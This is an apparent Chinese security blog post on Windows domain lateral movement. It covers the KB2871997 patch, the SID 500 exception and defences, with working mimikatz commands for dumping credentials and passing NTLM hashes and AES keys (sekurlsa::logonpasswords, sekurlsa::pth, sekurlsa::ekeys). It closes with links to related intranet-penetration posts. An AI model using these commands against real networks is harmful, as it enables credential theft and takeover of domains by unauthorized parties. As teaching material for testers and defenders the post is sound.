Pass the Hash&&Pass The Key

微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997

在域环境中，利用pass the hash的渗透方式往往是这样的：

获得一台域主机的权限
Dump内存获得用户hash
通过pass the hash尝试登录其他主机
继续搜集hash并尝试远程登录
直到获得域管理员账户hash，登录域控，最终成功控制整个域

下面简要介绍一下Pass The Hash技术发展的几段历史

1、2012年12月

微软发布了针对Pass The Hash攻击的防御指导，链接如下：
[http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques_English.pdf)

如图

2、2014年5月13日

微软终于发布了更新补丁kb2871997，禁止本地管理员账户用于远程连接，这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。

然而，Craig在测试中发现，在打了补丁之后，常规的Pass The Hash已经无法成功，唯独默认的 Administrator (SID 500)账号例外，利用这个账号仍可以进行Pass The Hash远程连接。

并且值得注意的是即使administrator改名，它的SID仍然是500，这种攻击方法依然有效。所以对于防御来说，即使打了补丁也要记得禁用SID=500的管理员账户。

相关链接如下：
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

3、如今

大家对Pass The Hash的认识越来越高，防御方法越来越多，比如上一篇提到的LAPS解决了域内主机本地管理员密码相同的问题。

同样，禁用NTLM使得psexec无法利用获得的ntlm hash进行远程连接。

4、mimikatz出现

它的出现再次改变了格局。mimikatz实现了在禁用NTLM的环境下仍然可以远程连接。

下面就实际测试一下其中的细节

Pass the Hash

抓取密码，本地管理员或者域管理员

privilege::debug
sekurlsa::logonpasswords

privilege::debug sekurlsa::logonpasswords >> C:/log.txt  获取hash

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:abc.com /ntlm:afffeba176210fad4628f0524bfe1942 /run:c:\windows\system32\cmd.exe"

Pass The Key (OverPass-the-Hash)

当系统安装了KB2871997补丁且禁用了NTLM的时候，那我们抓取到的ntlm hash

也就失去了作用，但是可以通过pass the key的攻击方式获得权限

mimikatz "privilege::debug" "sekurlsa::ekeys" 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:dc /domain:abc.com /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" 注入aes key

根据提示，尝试在系统安装补丁kb2871997后继续测试
安裝 : https://www.microsoft.com/en-us/download/details.aspx?id=42765
之后可以用\计算机名的方式通过远程共享查看目标机器(ps:这里必须要使用计算机名进行连接，会爆密码错误。不要用win10测试，win10机器测试会在一分鐘后重啓 ,)
(如果获取的散列是NTLM，则Kerberos凭证加密方法是RC4。如果散列加密方法为AES，则Kerberos票使用AES进行的加密。)

看我横向打你内网--PthPtk相关推荐

[原创]K8 cping 3.0大型内网渗透扫描工具
[原创]K8 Cscan 大型内网渗透自定义扫描器 https://www.cnblogs.com/k8gege/p/10519321.html Cscan简介: 何为自定义扫描器?其实也是插件化,但 ...
红日靶场vulnstack1 内网渗透学习
目录前言: 信息收集: phpmyadmin getshell 日志写shell yxcms getshell 植入后们: 内网域环境信息收集: 基于msf 进行信息收集: 基于msf 内网信息收集 ...
内网穿透是什么？哪些作用？
在购置电脑配件的时候,经常能看到很多高大上的成语或者词语,比如内网穿透,对于部分的电脑小白,是十分的不明朗的,不知道使用能实现什么,或者能不能进行使用,今天小编就刚学习到的"内网穿透&quo ...
11-20什么是内网，外网，局域网，如何判断
内网就是我们平常说的局域网.局域网就是在固定的一个地理区域内由2台以上的电脑用网线和其他网络设备搭建而成的一个封闭的计算机组.它可以是邻居之间的2台电脑,也可以是一幢100层大楼里的1000台电脑.局 ...
脱离取源设备的IPTV宽带机房搭建心得（私网汇聚、内网直播源、单播组播模式混合使用、光猫机顶盒的破解、超级路由的组播转发）
上个星期受用户邀请,去美丽的河南做了一个IPTV宽带机房的搭建,过程虽然有点坎坷,但好在最后都达到了用户的需求.在这里做一个记录,希望对我这种小菜日后方便参考使用,还望各位大神多多指教: 一.客户要求 ...
2022-10-03笔记(内网横向)
文章目录横向 ipc$连接和定时任务 at schtasks 当无法获得明文密码时破解hash,获取密码 Procdump+Mimikatz hashcat是kali自带的,[用法](https: ...
内网安全(四)---横向渗透：PTHPTKPTT
域横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值. PTT(pass the ticket): 利用的 ...
细说内网横向工具WMIHACK
目录 1.前言 2. 基础知识 2.1 WMI简介 2.2 WMI体系结构 2.3 WMI的类与命名空间 2.4 查询WMI 2.5 管理WMI 2.6 WMI事件 3.工具分析 3.1 WMIHAC ...
p66 内网安全-域横向批量atschtasksimpacket
数据来源本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...

看我横向打你内网--PthPtk